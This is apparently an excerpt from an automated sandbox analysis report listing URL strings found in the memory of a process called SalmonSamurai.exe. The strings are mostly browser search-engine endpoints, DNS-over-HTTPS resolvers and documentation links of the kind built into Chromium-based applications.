Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.icohttps://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.icohttps://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.icohttps://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Docs/issues/1005)
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.imgsmail.ru/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.imgsmail.ru/favicon.icohttps://go.mail.ru/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.mail.ru/chrome/newtab/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.mail.ru/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/wgsl/#texel-formats
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B04B000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/wgsl/#texel-formatstexture_2d
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/favicon.icohttps://hk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hladaj.atlas.sk/fulltext/?phrase=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/favicon.icohttps://id.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://log.getdropbox.com/hpkp
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://lss.sse-iacapps.com/query?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.icohttps://malaysia.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/favicon.icohttps://metager.de/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.org/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.icohttps://mx.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/favicon.icohttps://nl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/favicon.icohttps://nz.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nz.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/favicon.icohttps://oceanhero.today/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://oceanhero.today/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://pe.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://petalsearch.com/search?query=
